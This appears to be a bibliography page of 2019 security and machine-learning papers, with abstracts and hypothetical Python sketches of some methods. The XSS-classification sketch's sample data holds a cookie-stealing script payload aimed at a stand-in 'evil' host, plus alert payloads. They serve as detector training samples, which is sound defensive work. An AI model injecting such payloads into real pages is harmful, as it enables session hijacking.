Biblio

Found 773 results

Filters: Keyword is Training
2020-04-13
Kim, Dongchil, Kim, Kyoungman, Park, Sungjoo.  2019.  Automatic PTZ Camera Control Based on Deep-Q Network in Video Surveillance System. 2019 International Conference on Electronics, Information, and Communication (ICEIC). :1–3.
Recently, Pan/Tilt/Zoom (PTZ) cameras have been widely used in video surveillance systems. However, it is difficult to automatically control PTZ cameras according to moving objects in the surveillance area. This paper proposes an automatic camera control method based on a Deep-Q Network (DQN) for improving the recognition accuracy of anomalous actions in the video surveillance system. To generate PTZ camera control values, the proposed method uses the position and size information of the object received from the video analysis system. Implementation results show that the proposed method can automatically control the PTZ camera according to moving objects.
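The abstract gives only a high-level description of the controller. The following minimal Python sketch illustrates how a DQN agent could map an object's position and size to pan/tilt/zoom commands; the state encoding, action set, reward, and network size are assumptions for illustration, not details from the paper.

```python
# Hypothetical sketch: a DQN that maps object position/size to PTZ commands.
# The state encoding, action set, and reward below are illustrative assumptions.
import random
import torch
import torch.nn as nn

ACTIONS = ["pan_left", "pan_right", "tilt_up", "tilt_down", "zoom_in", "zoom_out", "hold"]

class QNetwork(nn.Module):
    def __init__(self, state_dim=4, n_actions=len(ACTIONS)):
        super().__init__()
        self.net = nn.Sequential(
            nn.Linear(state_dim, 64), nn.ReLU(),
            nn.Linear(64, 64), nn.ReLU(),
            nn.Linear(64, n_actions),
        )

    def forward(self, state):
        return self.net(state)

def select_action(q_net, state, epsilon=0.1):
    """Epsilon-greedy action selection over PTZ commands."""
    if random.random() < epsilon:
        return random.randrange(len(ACTIONS))
    with torch.no_grad():
        return int(q_net(state).argmax().item())

def reward(state):
    """Assumed reward: keep the object centered and at a target size in the frame."""
    x, y, w, h = state.tolist()
    center_err = abs(x - 0.5) + abs(y - 0.5)
    size_err = abs(w * h - 0.15)          # target ~15% of the frame area
    return -(center_err + size_err)

# One illustrative training step on a single transition (no replay buffer shown).
q_net, target_net = QNetwork(), QNetwork()
target_net.load_state_dict(q_net.state_dict())
optimizer = torch.optim.Adam(q_net.parameters(), lr=1e-3)

state = torch.tensor([0.7, 0.4, 0.2, 0.3])          # normalized x, y, w, h from video analytics
action = select_action(q_net, state)
next_state = torch.tensor([0.6, 0.45, 0.25, 0.35])  # state after executing the PTZ move
r, gamma = reward(next_state), 0.99

target = r + gamma * target_net(next_state).max().detach()
loss = nn.functional.mse_loss(q_net(state)[action], target)
optimizer.zero_grad(); loss.backward(); optimizer.step()
```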
2020-09-28
Akaishi, Sota, Uda, Ryuya.  2019.  Classification of XSS Attacks by Machine Learning with Frequency of Appearance and Co-occurrence. 2019 53rd Annual Conference on Information Sciences and Systems (CISS). :1–6.
Cross-site scripting (XSS) is one of the most common attacks on the web. It enables session hijacking via HTTP cookies, information collection through fake HTML input forms, and phishing with dummy sites. As a countermeasure against XSS attacks, machine learning has attracted a lot of attention. Existing studies have used SVM, Random Forest, and SCW for attack detection. However, these studies suffer from data sets that are too small or unbalanced, and from preprocessing methods for string vectorization that cause misclassification. The highest classification accuracy in prior work was 98%. Therefore, in this paper, we improve the preprocessing method for vectorization by using word2vec to capture the frequency of appearance and co-occurrence of words in XSS attack scripts. Moreover, we also use a large data set to decrease the bias of the data. Furthermore, we evaluate the classification results with two procedures. One is an inappropriate procedure that some researchers tend to select by mistake. The other is an appropriate procedure that can be applied to an attack detection filter in a real environment.
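As an illustration of the general pipeline the abstract describes (word2vec-based vectorization of scripts followed by a classifier), here is a minimal sketch. The tokenizer, toy corpus, and model parameters are assumptions, not the paper's actual setup.

```python
# Hypothetical sketch: vectorize scripts with word2vec and classify with an SVM.
# The tokenizer, corpus, and hyperparameters are illustrative, not the paper's setup.
import re
import numpy as np
from gensim.models import Word2Vec
from sklearn.svm import SVC

def tokenize(script):
    """Split a script into lowercase word-like tokens (crude approximation)."""
    return re.findall(r"[a-zA-Z_][a-zA-Z0-9_]*", script.lower())

scripts = ["<script>document.location='http://evil/?c='+document.cookie</script>",
           "<p>hello world</p>",
           "<img src=x onerror=alert(1)>",
           "<a href='/about'>about us</a>"]
labels = [1, 0, 1, 0]  # 1 = XSS, 0 = benign

corpus = [tokenize(s) for s in scripts]
w2v = Word2Vec(corpus, vector_size=50, window=5, min_count=1, epochs=50)

def embed(tokens):
    """Average the word vectors of a script's tokens (captures co-occurrence context)."""
    vecs = [w2v.wv[t] for t in tokens if t in w2v.wv]
    return np.mean(vecs, axis=0) if vecs else np.zeros(w2v.vector_size)

X = np.stack([embed(t) for t in corpus])
clf = SVC(kernel="rbf").fit(X, labels)
print(clf.predict([embed(tokenize("<svg onload=alert(document.cookie)>"))]))
```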
2020-11-02
Zhong, J., Yang, C..  2019.  A Compositionality Assembled Model for Learning and Recognizing Emotion from Bodily Expression. 2019 IEEE 4th International Conference on Advanced Robotics and Mechatronics (ICARM). :821–826.
When we express our internal state, such as emotions, the bodily expressions we use follow the compositionality principle, a theory in linguistics which proposes that the individual components of a bodily presentation, together with the rules used to combine them, are the main elements of this process. In this paper, this principle is applied to the process of expressing and recognizing emotional states through body expression, in which certain key features can be learned to represent primitives of the internal emotional state in the form of basic variables. This is done with a hierarchical recurrent neural network (RNN) learning framework, whose nonlinear dynamic bifurcation allows variables to be learned that represent different hierarchies. In addition, we apply adaptive machine learning techniques to meet the requirement of real-time emotion recognition, so that a stable representation can be maintained compared to previous work. The model is examined by comparing the PB values between the training and recognition phases. This hierarchical model demonstrates the plausibility of the compositionality hypothesis through RNN learning and explains how key features can be used and combined in bodily expression to convey an emotional state.
2020-03-23
Xu, Yilin, Ge, Weimin, Li, Xiaohong, Feng, Zhiyong, Xie, Xiaofei, Bai, Yude.  2019.  A Co-Occurrence Recommendation Model of Software Security Requirement. 2019 International Symposium on Theoretical Aspects of Software Engineering (TASE). :41–48.
To guarantee software quality, specifying security requirements (SRs) is essential for developing systems, especially security-critical software systems. However, using security threats to determine detailed SRs is quite difficult under the Common Criteria (CC), which is too confusing and technical for non-security specialists. In this paper, we propose a Co-occurrence Recommend Model (CoRM) to automatically recommend software SRs. In this model, the security threats of a product are extracted from software security target documents, in which the related security requirements are tagged. In order to establish relationships between software security threats and security requirements, semantic similarities between different security threats are calculated with the Skip-thoughts model. To evaluate our CoRM model, over 1000 security target documents covering 9 types of software products are used. The results suggest that building a CoRM model via semantic similarity is feasible and reliable.
2021-01-15
Yadav, D., Salmani, S..  2019.  Deepfake: A Survey on Facial Forgery Technique Using Generative Adversarial Network. 2019 International Conference on Intelligent Computing and Control Systems (ICCS). :852–857.
"Deepfake" it is an incipiently emerging face video forgery technique predicated on AI technology which is used for creating the fake video. It takes images and video as source and it coalesces these to make a new video using the generative adversarial network and the output is very convincing. This technique is utilized for generating the unauthentic spurious video and it is capable of making it possible to generate an unauthentic spurious video of authentic people verbally expressing and doing things that they never did by swapping the face of the person in the video. Deepfake can create disputes in countries by influencing their election process by defaming the character of the politician. This technique is now being used for character defamation of celebrities and high-profile politician just by swapping the face with someone else. If it is utilized in unethical ways, this could lead to a serious problem. Someone can use this technique for taking revenge from the person by swapping face in video and then posting it to a social media platform. In this paper, working of Deepfake technique along with how it can swap faces with maximum precision in the video has been presented. Further explained are the different ways through which we can identify if the video is generated by Deepfake and its advantages and drawback have been listed.
2020-03-23
Qin, Peng, Tan, Cheng, Zhao, Lei, Cheng, Yueqiang.  2019.  Defending against ROP Attacks with Nearly Zero Overhead. 2019 IEEE Global Communications Conference (GLOBECOM). :1–6.
Return-Oriented Programming (ROP) is a sophisticated exploitation technique that can drive target applications to perform arbitrary unintended operations by constructing a gadget chain that reuses existing small code sequences (gadgets) collected across the entire code space. In this paper, we propose to address ROP attacks from a different angle: shrinking the available code space at runtime. We present ROPStarvation, a generic and transparent ROP countermeasure that defends against all types of ROP attacks with almost zero run-time overhead. ROPStarvation does not aim to completely stop ROP attacks; instead it attempts to significantly raise the bar by decreasing the probability of launching a successful ROP exploit in practice. Moreover, shrinking the available code space at runtime is lightweight, which makes ROPStarvation practical to deploy even under high performance requirements. Results show that ROPStarvation successfully reduces the code space of target applications by 85%. With the reduced code segments, ROPStarvation decreases the probability of building a valid ROP gadget chain by 100% and 83% respectively, depending on whether the adversary knows that the vulnerable applications are protected by ROPStarvation. Evaluations on the SPEC CPU2006 benchmark show that ROPStarvation introduces nearly zero (0.2% on average) run-time performance overhead.
2020-09-21
Chow, Ka-Ho, Wei, Wenqi, Wu, Yanzhao, Liu, Ling.  2019.  Denoising and Verification Cross-Layer Ensemble Against Black-box Adversarial Attacks. 2019 IEEE International Conference on Big Data (Big Data). :1282–1291.
Deep neural networks (DNNs) have demonstrated impressive performance on many challenging machine learning tasks. However, DNNs are vulnerable to adversarial inputs generated by adding maliciously crafted perturbations to the benign inputs. As a growing number of attacks have been reported to generate adversarial inputs of varying sophistication, the defense-attack arms race has been accelerated. In this paper, we present MODEF, a cross-layer model diversity ensemble framework. MODEF intelligently combines unsupervised model denoising ensemble with supervised model verification ensemble by quantifying model diversity, aiming to boost the robustness of the target model against adversarial examples. Evaluated using eleven representative attacks on popular benchmark datasets, we show that MODEF achieves remarkable defense success rates, compared with existing defense methods, and provides a superior capability of repairing adversarial inputs and making correct predictions with high accuracy in the presence of black-box attacks.
2020-01-13
Zegzhda, Dmitry, Lavrova, Daria, Khushkeev, Aleksei.  2019.  Detection of information security breaches in distributed control systems based on values prediction of multidimensional time series. 2019 IEEE International Conference on Industrial Cyber Physical Systems (ICPS). :780–784.
We propose an approach for detecting information security breaches in distributed control systems based on the prediction of multidimensional time series formed from sensor and actuator data.
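The abstract only states the general idea, so the sketch below shows one common way to realize prediction-based detection: fit a model that forecasts the next multidimensional sample from a sliding window, then flag a breach when the prediction residual exceeds a threshold. The lag length, model choice, and 3-sigma rule are assumptions.

```python
# Hypothetical sketch: flag a breach when the prediction error for the next
# multidimensional sample (sensor/actuator values) exceeds a learned threshold.
import numpy as np
from sklearn.linear_model import Ridge

def make_supervised(series, lag=5):
    """Turn a (T, d) multidimensional series into (history window -> next sample) pairs."""
    X = np.stack([series[i:i + lag].ravel() for i in range(len(series) - lag)])
    y = series[lag:]
    return X, y

rng = np.random.default_rng(0)
normal = np.cumsum(rng.normal(0, 0.1, size=(500, 3)), axis=0)  # stand-in for sensor data

X, y = make_supervised(normal)
model = Ridge().fit(X, y)
residuals = np.linalg.norm(model.predict(X) - y, axis=1)
threshold = residuals.mean() + 3 * residuals.std()   # assumed 3-sigma rule

def is_breach(window, next_sample):
    """window: (lag, d) recent history; next_sample: (d,) newly observed values."""
    err = np.linalg.norm(model.predict(window.ravel()[None, :]) - next_sample)
    return err > threshold
```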
2020-04-03
Sattar, Naw Safrin, Arifuzzaman, Shaikh, Zibran, Minhaz F., Sakib, Md Mohiuddin.  2019.  An Ensemble Approach for Suspicious Traffic Detection from High Recall Network Alerts. 2019 IEEE International Conference on Big Data (Big Data). :4299–4308.
Web services from large-scale systems are prevalent all over the world. However, these systems are inherently vulnerable and prone to intrusion by adversaries seeking illegal benefits. To detect anomalous events, previous works focus on inspecting raw system logs by identifying outliers in workflows or by relying on machine learning methods. Though those works successfully identify anomalies, their models use large training sets and process entire system logs. To reduce the quantity of logs that need to be processed, high-recall suspicious network alert systems can be applied to preprocess system logs, so that only the logs that trigger alerts are retrieved for further use. Given the universal use of network traffic alerts in Security Operations Centers, the anomaly detection problem can be transformed into classifying truly suspicious network traffic alerts versus false alerts. In this work, we propose an ensemble model to distinguish truly suspicious alerts from false alerts. Our model consists of two sub-models with different feature extraction strategies to ensure diversity and generalization. We use decision-tree-based boosters and deep neural networks to build ensemble models for classification. Finally, we evaluate our approach on the suspicious network alerts dataset provided by the 2019 IEEE BigData Cup: Suspicious Network Event Recognition. Under the AUC metric, our model achieves 0.9068 on the whole testing set.
2020-11-02
Pan, C., Huang, J., Gong, J., Yuan, X..  2019.  Few-Shot Transfer Learning for Text Classification With Lightweight Word Embedding Based Models. IEEE Access. 7:53296–53304.
Many deep learning architectures have been employed to model the semantic compositionality of text sequences, but they require a huge amount of supervised data for parameter training, making them infeasible in situations where numerous annotated samples are not available or do not exist at all. Different from data-hungry deep models, lightweight word embedding-based models can represent text sequences in a plug-and-play way due to their parameter-free property. In this paper, a modified hierarchical pooling strategy over pre-trained word embeddings is proposed for text classification in a few-shot transfer learning setting. The model leverages and transfers knowledge obtained from source domains to recognize and classify unseen text sequences with just a handful of support examples in the target problem domain. Extensive experiments on five datasets including both English and Chinese text demonstrate that simple word embedding-based models (SWEMs) with parameter-free pooling operations are able to abstract and represent the semantics of text. The proposed modified hierarchical pooling method exhibits significant classification performance in few-shot transfer learning tasks compared with other alternative methods.
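For context, parameter-free hierarchical pooling is commonly realized as average pooling within local windows followed by max pooling across windows. The sketch below illustrates that operation; the window size and the nearest-centroid usage note are assumptions, not the paper's exact configuration.

```python
# Hypothetical sketch of parameter-free hierarchical pooling over word embeddings:
# average-pool within local windows, then max-pool across windows.
import numpy as np

def hierarchical_pool(embeddings, window=3):
    """embeddings: (seq_len, dim) array of pre-trained word vectors."""
    seq_len, dim = embeddings.shape
    if seq_len < window:                      # pad short sequences with zero vectors
        pad = np.zeros((window - seq_len, dim))
        embeddings, seq_len = np.vstack([embeddings, pad]), window
    # average over each sliding window to retain local word-order information
    windows = np.stack([embeddings[i:i + window].mean(axis=0)
                        for i in range(seq_len - window + 1)])
    # max over windows yields a fixed-size, parameter-free sentence representation
    return windows.max(axis=0)

# Usage: feed the pooled vectors of a handful of support examples to any lightweight
# classifier (e.g. nearest centroid) for few-shot transfer to a new domain.
rng = np.random.default_rng(0)
sentence = rng.normal(size=(12, 300))         # 12 tokens, 300-d embeddings (e.g. GloVe)
features = hierarchical_pool(sentence)
print(features.shape)                         # (300,)
```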
2020-02-10
Hu, Taifeng, Wu, Liji, Zhang, Xiangmin, Yin, Yanzhao, Yang, Yijun.  2019.  Hardware Trojan Detection Combine with Machine Learning: an SVM-based Detection Approach. 2019 IEEE 13th International Conference on Anti-counterfeiting, Security, and Identification (ASID). :202–206.
As integrated circuits (ICs) appear in all aspects of life, whether an IC is secure and reliable has become an increasingly significant concern. An attacker can achieve malicious goals by adding or removing modules, known as hardware Trojans (HTs). In this paper, we use side-channel analysis (SCA) and a support vector machine (SVM) classifier to determine whether there is a Trojan in the circuit. We use a SAKURA-G circuit board with a Xilinx SPARTAN-6 FPGA to carry out our experiments. Results show that the Trojan detection rate is up to 93% and the classification accuracy is up to 91.8475%.
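The abstract does not specify the features or kernel used; the following is a minimal sketch of the general approach of training an SVM on labeled side-channel traces. The synthetic traces, the injected "extra switching activity", and the RBF kernel are assumptions standing in for real measurements from the board.

```python
# Hypothetical sketch: classify power traces as Trojan-free vs. Trojan-infected with an SVM.
# Real side-channel traces from the SAKURA-G board would replace the synthetic data below.
import numpy as np
from sklearn.model_selection import train_test_split
from sklearn.pipeline import make_pipeline
from sklearn.preprocessing import StandardScaler
from sklearn.svm import SVC

rng = np.random.default_rng(0)
n_traces, trace_len = 400, 1000
clean = rng.normal(0.0, 1.0, size=(n_traces, trace_len))
trojan = rng.normal(0.0, 1.0, size=(n_traces, trace_len))
trojan[:, 400:420] += 0.3                      # assumed extra switching activity of the HT

X = np.vstack([clean, trojan])
y = np.array([0] * n_traces + [1] * n_traces)  # 0 = golden chip, 1 = infected

X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.25, random_state=0)
model = make_pipeline(StandardScaler(), SVC(kernel="rbf", C=1.0))
model.fit(X_train, y_train)
print("detection accuracy:", model.score(X_test, y_test))
```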
2022-06-06
Feng, Ri-Chen, Lin, Daw-Tung, Chen, Ken-Min, Lin, Yi-Yao, Liu, Chin-De.  2019.  Improving Deep Learning by Incorporating Semi-automatic Moving Object Annotation and Filtering for Vision-based Vehicle Detection. 2019 IEEE International Conference on Systems, Man and Cybernetics (SMC). :2484–2489.
Deep learning has undergone tremendous advancements in computer vision studies. The training of deep learning neural networks depends on a considerable amount of ground truth data. However, labeling ground truth data is a labor-intensive task, particularly for large-volume video analytics applications such as video surveillance and vehicle detection for autonomous driving. This paper presents a rapid and accurate method for associative searching in big image data obtained from security monitoring systems. We developed a semi-automatic moving object annotation method for improving deep learning models. The proposed method comprises three stages, namely automatic foreground object extraction, object annotation in subsequent video frames, and dataset construction using human-in-the-loop quick selection. Furthermore, the proposed method expedites the dataset collection and ground truth annotation processes. In contrast to data augmentation and data generative models, the proposed method produces a large amount of real data, which may improve training results and avoid the adverse effects engendered by artifactual data. We applied the constructed annotation dataset to train a deep learning you-only-look-once (YOLO) model to perform vehicle detection on street intersection surveillance videos. Experimental results demonstrated that detection performance improved from a mean average precision (mAP) of 83.99 to 88.03.
2020-06-01
Xenya, Michael Christopher, Kwayie, Crentsil, Quist-Aphesti, Kester.  2019.  Intruder Detection with Alert Using Cloud Based Convolutional Neural Network and Raspberry Pi. 2019 International Conference on Computing, Computational Modelling and Applications (ICCMA). :46–464.
In this paper, an intruder detection system has been built with an implementation of a convolutional neural network (CNN) using a Raspberry Pi, Microsoft's Azure, and Twilio cloud systems. The CNN algorithm, which is stored in the cloud, classifies input data as either intruder or user. By using the Raspberry Pi as middleware and the Raspberry Pi camera for image acquisition, efficient execution of the learning and classification operations is performed using the greater resources that cloud computing offers. The cloud system is also programmed to alert designated users via multimedia messaging services (MMS) when intruders or users are detected. Furthermore, our work demonstrates that, although a convolutional neural network can impose high computing demands on a processor, the input data can be obtained with low-cost, low-power modules and middleware while delegating the actual learning algorithm execution to the cloud system.
2020-01-27
Qureshi, Ayyaz-Ul-Haq, Larijani, Hadi, Javed, Abbas, Mtetwa, Nhamoinesu, Ahmad, Jawad.  2019.  Intrusion Detection Using Swarm Intelligence. 2019 UK/China Emerging Technologies (UCET). :1–5.
Recent advances in networking and communication technologies have enabled Internet-of-Things (IoT) devices to communicate more frequently and faster. An IoT device typically transmits data over the Internet, which is an insecure channel. Cyber attacks such as denial-of-service (DoS), man-in-the-middle, and SQL injection are considered big threats to IoT devices. In this paper, an anomaly-based intrusion detection scheme is proposed that can protect sensitive information and detect novel cyber-attacks. The Artificial Bee Colony (ABC) algorithm is used to train the Random Neural Network (RNN) based system (RNN-ABC). The proposed scheme is trained on NSL-KDD Train+ and tested on unseen data. The experimental results suggest that swarm intelligence and the RNN successfully classify novel attacks with an accuracy of 91.65%. Additionally, the performance of the proposed scheme is compared with a hybrid multilayer perceptron (MLP) based intrusion detection system using sensitivity, mean of mean squared error (MMSE), standard deviation of MSE (SDMSE), best mean squared error (BMSE), and worst mean squared error (WMSE) parameters. All experimental tests confirm the robustness and high accuracy of the proposed scheme.
2020-01-21
Taib, Abidah Mat, Othman, Nor Arzami, Hamid, Ros Syamsul, Halim, Iman Hazwam Abd.  2019.  A Learning Kit on IPv6 Deployment and Its Security Challenges for Neophytes. 2019 21st International Conference on Advanced Communication Technology (ICACT). :419–424.
Understanding IP address depletion and the importance of handling security issues in IPv6 deployment can make IT personnel more effective and helpful to the organization. This also applies to management personnel responsible for approving budgets or organizational policies related to network security. Unfortunately, new employees or fresh graduates may not really understand the challenges related to IPv6 deployment. In order to be equipped with the appropriate knowledge and skills, these people may require a few weeks of workshops or training, which of course involves implementation costs as well as sacrificing allocated working hours. As an alternative to save cost and to help new IT personnel quickly become educated about and familiar with IPv6 deployment issues, this paper presents a learning kit designed with self-learning features that help neophytes learn about IPv6 at their own pace. The kit contains compact notes, a brief security model and framework, as well as a guided module with supporting quizzes to reinforce understanding of the topics. Since IPv6 is still in the early phase of implementation in most developing countries, this kit can be an additional assisting tool to accelerate the deployment of IPv6 environments in any organization. The kit can also be used by teachers and trainers as a supporting tool in the classroom. Pre-alpha testing has attracted some potential users, and the findings confirmed their acceptance. The kit has the potential to be further enhanced and commercialized.
2020-01-27
Zhang, Naiji, Jaafar, Fehmi, Malik, Yasir.  2019.  Low-Rate DoS Attack Detection Using PSD Based Entropy and Machine Learning. 2019 6th IEEE International Conference on Cyber Security and Cloud Computing (CSCloud)/ 2019 5th IEEE International Conference on Edge Computing and Scalable Cloud (EdgeCom). :59–62.
The Distributed Denial of Service (DDoS) attack is one of the most common attacks and is hard to mitigate; it becomes even more difficult when dealing with Low-rate DoS (LDoS) attacks. LDoS attacks exploit a vulnerability of the TCP congestion-control mechanism by sending malicious traffic at a low constant rate to affect the victim machine. Recently, machine learning approaches have been applied to detect complex DDoS attacks and improve the efficiency and robustness of intrusion detection systems. In this research, the algorithm is designed to balance the detection rate and its efficiency. The detection algorithm combines a Power Spectral Density (PSD) entropy function and a Support Vector Machine to distinguish LDoS traffic from normal traffic. In our solution, the detection rate and efficiency are adjustable via a parameter in the decision algorithm. For high efficiency, the detection method always detects attacks first by calculating the PSD entropy and comparing it with two adaptive thresholds. The thresholds can efficiently filter nearly 19% of the samples with a high detection rate. To minimize the computational cost and look only for the patterns that are most relevant for detection, a Support Vector Machine based model is applied to learn the traffic pattern and select appropriate features for the detection algorithm. The experimental results show that the proposed approach can detect 99.19% of LDoS attacks and has O(n log n) time complexity in the best case.
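To make the two-stage idea concrete, here is a minimal sketch: a cheap PSD-entropy check against two thresholds, with an SVM handling only the ambiguous traffic windows. The entropy estimator (Welch), the threshold values, and the toy feature set are assumptions, not the paper's parameters.

```python
# Hypothetical sketch of the two-stage idea: a cheap PSD-entropy check with two
# thresholds, falling back to an SVM only for ambiguous traffic windows.
import numpy as np
from scipy.signal import welch
from sklearn.svm import SVC

def psd_entropy(rate_series, fs=100.0):
    """Shannon entropy of the normalized power spectral density (Welch estimate)."""
    _, psd = welch(rate_series, fs=fs, nperseg=min(256, len(rate_series)))
    p = psd / psd.sum()
    return float(-(p * np.log2(p + 1e-12)).sum())

LOW_T, HIGH_T = 3.0, 6.0     # assumed adaptive thresholds learned from training data

def detect(rate_series, svm, feature_fn):
    h = psd_entropy(rate_series)
    if h < LOW_T:
        return "ldos"        # periodic low-rate bursts concentrate spectral power
    if h > HIGH_T:
        return "normal"      # broadband, noise-like traffic
    # ambiguous region: hand off to the trained SVM
    return "ldos" if svm.predict([feature_fn(rate_series)])[0] == 1 else "normal"

# Toy usage with an SVM trained on the same entropy feature.
rng = np.random.default_rng(0)
train = [rng.normal(10, 1, 1000) for _ in range(20)] + \
        [np.tile([50] * 20 + [0] * 180, 5).astype(float) for _ in range(20)]
labels = [0] * 20 + [1] * 20
svm = SVC().fit([[psd_entropy(x)] for x in train], labels)
print(detect(train[0], svm, lambda x: [psd_entropy(x)]))
```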
2020-04-03
Song, Liwei, Shokri, Reza, Mittal, Prateek.  2019.  Membership Inference Attacks Against Adversarially Robust Deep Learning Models. 2019 IEEE Security and Privacy Workshops (SPW). :50–56.
In recent years, the research community has increasingly focused on understanding the security and privacy challenges posed by deep learning models. However, the security domain and the privacy domain have typically been considered separately. It is thus unclear whether the defense methods in one domain will have any unexpected impact on the other domain. In this paper, we take a step towards enhancing our understanding of deep learning models when the two domains are combined together. We do this by measuring the success of membership inference attacks against two state-of-the-art adversarial defense methods that mitigate evasion attacks: adversarial training and provable defense. On the one hand, membership inference attacks aim to infer an individual's participation in the target model's training dataset and are known to be correlated with target model's overfitting. On the other hand, adversarial defense methods aim to enhance the robustness of target models by ensuring that model predictions are unchanged for a small area around each sample in the training dataset. Intuitively, adversarial defenses may rely more on the training dataset and be more vulnerable to membership inference attacks. By performing empirical membership inference attacks on both adversarially robust models and corresponding undefended models, we find that the adversarial training method is indeed more susceptible to membership inference attacks, and the privacy leakage is directly correlated with model robustness. We also find that the provable defense approach does not lead to enhanced success of membership inference attacks. However, this is achieved by significantly sacrificing the accuracy of the model on benign data points, indicating that privacy, security, and prediction accuracy are not jointly achieved in these two approaches.
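For readers unfamiliar with how such leakage is measured, the sketch below shows a simple confidence-thresholding membership inference baseline of the kind commonly used to quantify privacy leakage. The threshold, the Beta-distributed toy confidences, and the balanced-accuracy metric are assumptions for illustration, not the paper's attack.

```python
# Hypothetical sketch of a simple confidence-based membership inference baseline:
# predict "member" when the model's confidence on the true label exceeds a threshold.
import numpy as np

def membership_inference(confidences_on_true_label, threshold=0.9):
    """Returns 1 (predicted member of the training set) when confidence >= threshold."""
    return (np.asarray(confidences_on_true_label) >= threshold).astype(int)

def attack_accuracy(conf_train, conf_test, threshold=0.9):
    """Balanced accuracy over known members (train) and non-members (test)."""
    tpr = membership_inference(conf_train, threshold).mean()   # members flagged
    fpr = membership_inference(conf_test, threshold).mean()    # non-members flagged
    return 0.5 * (tpr + (1 - fpr))

# Toy illustration: a model that fits its training points more tightly (as adversarial
# training tends to) is more confident on members, so the attack beats the 0.5 baseline.
rng = np.random.default_rng(0)
conf_members = rng.beta(8, 1, 1000)       # high confidence on training data
conf_nonmembers = rng.beta(4, 2, 1000)    # lower confidence on unseen data
print(attack_accuracy(conf_members, conf_nonmembers))
```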
2020-10-26
Sethi, Kamalakanta, Kumar, Rahul, Sethi, Lingaraj, Bera, Padmalochan, Patra, Prashanta Kumar.  2019.  A Novel Machine Learning Based Malware Detection and Classification Framework. 2019 International Conference on Cyber Security and Protection of Digital Services (Cyber Security). :1–4.
As time progresses, new and complex malware types are being generated, which pose a serious threat to computer systems. Due to this drastic increase in the number of malware samples, signature-based malware detection techniques cannot provide accurate results. Different studies have demonstrated the proficiency of machine learning for the detection and classification of malware files. Further, the accuracy of these machine learning models can be improved by using feature selection algorithms to select the most essential features, reducing the size of the dataset and thus the amount of computation. In this paper, we develop a machine learning based malware analysis framework for efficient and accurate malware detection and classification. We use the Cuckoo sandbox for dynamic analysis, which executes malware in an isolated environment and generates an analysis report based on system activities during execution. Further, we propose a feature extraction and selection module that extracts features from the report and selects the most important ones to ensure high accuracy at minimum computational cost. Then, we employ different machine learning algorithms for accurate detection and fine-grained classification. Experimental results show that we achieve high detection and classification accuracy in comparison to state-of-the-art approaches.
2020-08-24
Sarma, Subramonian Krishna.  2019.  Optimized Activation Function on Deep Belief Network for Attack Detection in IoT. 2019 Third International conference on I-SMAC (IoT in Social, Mobile, Analytics and Cloud) (I-SMAC). :702–708.
This paper focuses on presenting a novel attack detection system to address risk issues in IoT. The presented attack detection system ties into DevOps, as it creates a correlation between development and IT operations, and it helps ensure the operational security of different applications. The implemented system incorporates two main stages: the proposed feature extraction process and classification. The data from every application is processed in the initial feature extraction stage, which concatenates statistical and higher-order statistical features. These extracted features are then supplied to the classification process, which determines the presence of attacks. For classification, this paper deploys an optimized Deep Belief Network (DBN) in which the activation function is tuned optimally by a well-known meta-heuristic called the Lion Algorithm (LA). Finally, the performance of the proposed work is compared with, and shown to outperform, other conventional methods.
2020-02-17
Ying, Huan, Ouyang, Xuan, Miao, Siwei, Cheng, Yushi.  2019.  Power Message Generation in Smart Grid via Generative Adversarial Network. 2019 IEEE 3rd Information Technology, Networking, Electronic and Automation Control Conference (ITNEC). :790–793.
As the next generation of the power system, the smart grid is developing toward automation and intelligence. Along with the benefits brought by smart grids, e.g., improved energy conversion rate, power utilization rate, and power supply quality, come security challenges. One of the most important issues in smart grids is to ensure reliable communication between the secondary equipment. The state-of-the-art method to ensure smart grid security is to detect cyber attacks with deep learning. However, due to the small number of negative samples, the performance of the detection system is limited. In this paper, we propose a novel approach that utilizes a Generative Adversarial Network (GAN) to generate abundant negative samples, which helps to improve the performance of the state-of-the-art detection system. The evaluation results demonstrate that the proposed method can effectively improve the performance of the detection system by 4%.
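As a rough illustration of using a GAN to augment a scarce negative class, the sketch below trains a tiny generator/discriminator pair on stand-in "attack message" feature vectors and then samples synthetic negatives. The feature dimension, architectures, and training schedule are assumptions, not the paper's design.

```python
# Hypothetical sketch: a minimal GAN that generates synthetic "attack message" feature
# vectors to augment the scarce negative class. Dimensions and architecture are assumed.
import torch
import torch.nn as nn

FEATURE_DIM, NOISE_DIM = 32, 16

G = nn.Sequential(nn.Linear(NOISE_DIM, 64), nn.ReLU(), nn.Linear(64, FEATURE_DIM))
D = nn.Sequential(nn.Linear(FEATURE_DIM, 64), nn.LeakyReLU(0.2), nn.Linear(64, 1), nn.Sigmoid())
opt_g = torch.optim.Adam(G.parameters(), lr=2e-4)
opt_d = torch.optim.Adam(D.parameters(), lr=2e-4)
bce = nn.BCELoss()

real_attacks = torch.randn(200, FEATURE_DIM) + 2.0   # stand-in for real negative samples

for step in range(500):
    # --- train the discriminator on real vs. generated samples ---
    z = torch.randn(64, NOISE_DIM)
    fake = G(z).detach()
    real = real_attacks[torch.randint(0, len(real_attacks), (64,))]
    d_loss = bce(D(real), torch.ones(64, 1)) + bce(D(fake), torch.zeros(64, 1))
    opt_d.zero_grad(); d_loss.backward(); opt_d.step()

    # --- train the generator to fool the discriminator ---
    z = torch.randn(64, NOISE_DIM)
    g_loss = bce(D(G(z)), torch.ones(64, 1))
    opt_g.zero_grad(); g_loss.backward(); opt_g.step()

# The generated vectors can then be appended to the detector's training set.
synthetic_negatives = G(torch.randn(1000, NOISE_DIM)).detach()
print(synthetic_negatives.shape)
```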
2020-08-03
Juuti, Mika, Szyller, Sebastian, Marchal, Samuel, Asokan, N..  2019.  PRADA: Protecting Against DNN Model Stealing Attacks. 2019 IEEE European Symposium on Security and Privacy (EuroS P). :512–527.
